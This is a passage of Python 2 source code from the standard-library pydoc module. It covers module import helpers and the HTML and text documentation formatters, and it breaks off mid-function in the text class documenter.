and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88564 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo', '$py.class'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (0, None))
if lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://docs.python.org/library")
basedir = os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)/cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100/cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name), name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0]),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
value = getattr(object, key)
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
